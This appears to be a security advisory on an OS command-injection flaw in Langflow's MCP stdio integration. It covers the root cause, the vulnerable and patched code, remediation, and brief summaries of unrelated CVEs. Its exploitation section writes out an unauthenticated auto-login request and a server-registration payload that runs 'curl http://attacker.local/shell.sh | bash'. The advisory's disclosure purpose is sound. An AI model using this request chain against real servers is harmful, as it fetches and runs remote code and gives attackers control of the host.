Oct 8, 2026·5 min read·7 visits
Langflow versions prior to 1.10.3 allowed unauthenticated remote attackers to execute arbitrary shell commands on the hosting system by exploiting a model context protocol (MCP) server integration wrapper that parsed commands inside a shell context.
A critical OS command injection vulnerability exists in Langflow's Model Context Protocol (MCP) server integration using stdio transport, allowing unauthenticated remote command execution under default configurations.
Langflow is a low-code orchestration framework for building artificial intelligence applications. To facilitate communication with external applications, Langflow implements the Model Context Protocol (MCP), supporting integration via a standard input/output (stdio) transport channel.
In versions prior to 1.10.3, the stdio transport mechanism did not safely handle host command execution when initializing external servers. The core vulnerability stems from the application directly spawning subprocesses with user-controlled parameters within a shell evaluation context.
The attack surface is expanded by Langflow's default setup, where the configuration variable LANGFLOW_AUTO_LOGIN is set to true. This configuration enables remote, unauthenticated network users to obtain administrative tokens and trigger arbitrary OS command execution by registering or importing malicious workflow configurations.
The root cause of CVE-2026-105697 is the improper neutralization of special elements used in operating system commands (CWE-78) within the MCP integration component.
Initially, the backend processed the execution parameters through MCPStdioClient._connect_to_server in src/lfx/src/lfx/base/mcp/util.py using a system shell context. The command string was constructed using unsanitized user-supplied parameters, enabling shell interpreters (such as /bin/sh or cmd.exe) to evaluate command separators, redirection symbols, and subshell executions.
Furthermore, validation logic was decoupled from the execution sink. While some Pydantic validation occurred at the REST API controller boundary via the MCPServerConfig model, this validation was not applied to configurations embedded directly within workflow files, parameters, or tweaks. Consequently, an attacker could bypass front-end validation gates entirely by importing a crafted JSON workflow, forcing the backend runtime to invoke the execution sink with malicious command parameters.
The transition from the vulnerable execution model to the secure implementation involved restricting process spawning to shell-less execution and implementing a centralized validation gate directly before the execution sink.
Below is a representation of the structural modifications applied to the vulnerable process creation flow:
# Vulnerable Implementation
# File: src/lfx/src/lfx/base/mcp/util.py
def _connect_to_server(self, command_str: str):
# The command string was executed directly via a shell wrapper
# Shell evaluation allowed metacharacters to trigger command execution
self.process = subprocess.Popen(
command_str,
shell=True, # Critical Flaw: shell=True evaluated command separators
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
# Patched Implementation
# File: src/lfx/src/lfx/base/mcp/security.py
def validate_mcp_stdio_config(command: str, args: list, env: dict):
# 1. Enforce that the command is a single executable binary
if " " in command.strip():
raise MCPStdioSecurityError("Command must be a single executable binary")
# 2. Match against a strict allowed executable list
if command not in ALLOWED_MCP_COMMANDS:
raise MCPStdioSecurityError(f"Command '{command}' is not in the approved allowlist")
# 3. Check arguments for command injection metacharacters
for arg in args:
if any(char in arg for char in DANGEROUS_SHELL_CHARS):
raise MCPStdioSecurityError("Dangerous characters detected in arguments")
# 4. Reject dangerous environment variables to prevent library hijacking
for key in env.keys():
if key.lower() in DANGEROUS_ENV_VARS:
raise MCPStdioSecurityError(f"Dangerous environment variable detected: {key}")The update resolved the vulnerability by setting shell=False on the process spawning engine and executing validate_mcp_stdio_config immediately before execution. This design guarantees that even if a workflow circumvents initial API parsers, the runtime wrapper blocks the subprocess from executing if it violates security controls.
Exploitation of CVE-2026-105697 requires network access to the Langflow HTTP API port. The default environment is susceptible to unauthenticated attacks because automatic login generates functional administrative tokens without requiring valid credentials.
An attacker first interacts with the authentication endpoint to acquire a session token:
GET /api/v1/auto_login HTTP/1.1
Host: target-langflow.local:7860The backend returns an authorization token. Using this token, the attacker registers a new MCP server configuration containing the target payload within the stdio execution properties:
POST /api/v2/mcp/servers/malicious_server HTTP/1.1
Host: target-langflow.local:7860
Authorization: Bearer <session_token>
Content-Type: application/json
{
"command": "bash",
"args": ["-c", "curl http://attacker.local/shell.sh | bash"],
"env": {}
}When this configuration is submitted, the backend attempts to establish a connection with the server to fetch metadata. During this initialization, the MCPStdioClient invokes the OS command runner. The command executes under the privileges of the Langflow server daemon process, granting the attacker interactive control over the host.
The impact of successful exploitation is critical, as represented by the CVSS score of 9.9 and vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H.
The scope metric is evaluated as Changed (S:C) because executing commands within the operating system shell breaks the execution boundaries of the Langflow application sandbox. An attacker gains full capabilities to read, write, or modify system files, access runtime credentials, and utilize the host for lateral movement within local networks.
While the current Exploit Prediction Scoring System (EPSS) rating remains low, the severity of the flaw dictates immediate patching. The vulnerability exposes application workflows, proprietary datasets, LLM API keys, and underlying infrastructure to unauthorized actors.
Remediation requires upgrading the Langflow deployment and securing its configuration parameters.
Administrators must update packages to the designated secure versions: langflow >= 1.10.3, langflow-base >= 0.10.3, and lfx >= 1.10.3.
If immediate software upgrade is not possible, the attack vector must be mitigated by disabling auto-login features and isolating network interfaces. Set the environment variable LANGFLOW_AUTO_LOGIN=false to block unauthorized users from obtaining valid session tokens. Additionally, bind the server daemon strictly to localhost or isolate the interface behind firewalls and corporate VPN networks.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
langflow langflow-ai | >= 1.1.2, < 1.10.3 | 1.10.3 |
langflow-base langflow-ai | >= 0.1.2, < 0.10.3 | 0.10.3 |
lfx langflow-ai | < 1.10.3 | 1.10.3 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-78 (Improper Neutralization of Special Elements used in an OS Command) |
| Attack Vector | Network (AV:N) |
| CVSS Severity Score | 9.9 (Critical) |
| EPSS Score | 0.00396 |
| Exploit Status | poc |
| KEV Status | Not Listed |
The application constructs an OS command using externally-supplied inputs but fails to properly sanitize or neutralize special characters before passing the string to a command interpreter.
An unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in Ghost CMS from version 6.54.1 to 6.65.0. The vulnerability stems from a validation bypass in the favicon resolution logic within the bookmark-fetching subsystem, which allows remote, unauthenticated attackers to trigger arbitrary HTTP requests to the local host and internal networks. This bypass circumvents the custom DNS-level IP blocklist controls configured globally in the application.
A resource allocation vulnerability (CWE-770) in lz4-java before version 1.11.4 allows an unauthenticated remote attacker to trigger CPU exhaustion and high garbage collection overhead by streaming empty concatenated LZ4 frames.
A Denial of Service (DoS) vulnerability exists in the yawkat fork of lz4-java prior to version 1.11.4. Under specific non-default configurations (stopOnEmptyBlock = false), parsing crafted streams with a large sequence of contiguous empty LZ4 blocks triggers uncontrolled recursion inside the LZ4BlockInputStream.refill() method, causing stack exhaustion and thread termination.
CVE-2026-76485 is a critical stack-based buffer overflow vulnerability in the VXLAN OAM (NGOAM) parsing component of Cisco NX-OS Software. The flaw enables an unauthenticated, remote attacker to execute arbitrary code with root privileges or trigger a denial of service on affected Nexus switches. This vulnerability is triggered through crafted packets sent to an IP interface. No workarounds are currently available to mitigate the vulnerability while preserving the NGOAM functionality. Cisco has published software patches to address this flaw.
A local privilege escalation and code execution vulnerability exists in the yawkat fork of lz4-java when extracting its bundled JNI shared library into the system temporary directory. Predictable path derivation and lack of exclusive file creation flags allow a local attacker to hijack library loading via a race condition.
A missing authorization vulnerability in Langflow versions 1.0.0 through 1.10.0 allows authenticated users (and unauthenticated users in versions prior to 1.7.2) to access private workflow structures and execute graph components by targeting deprecated API endpoints.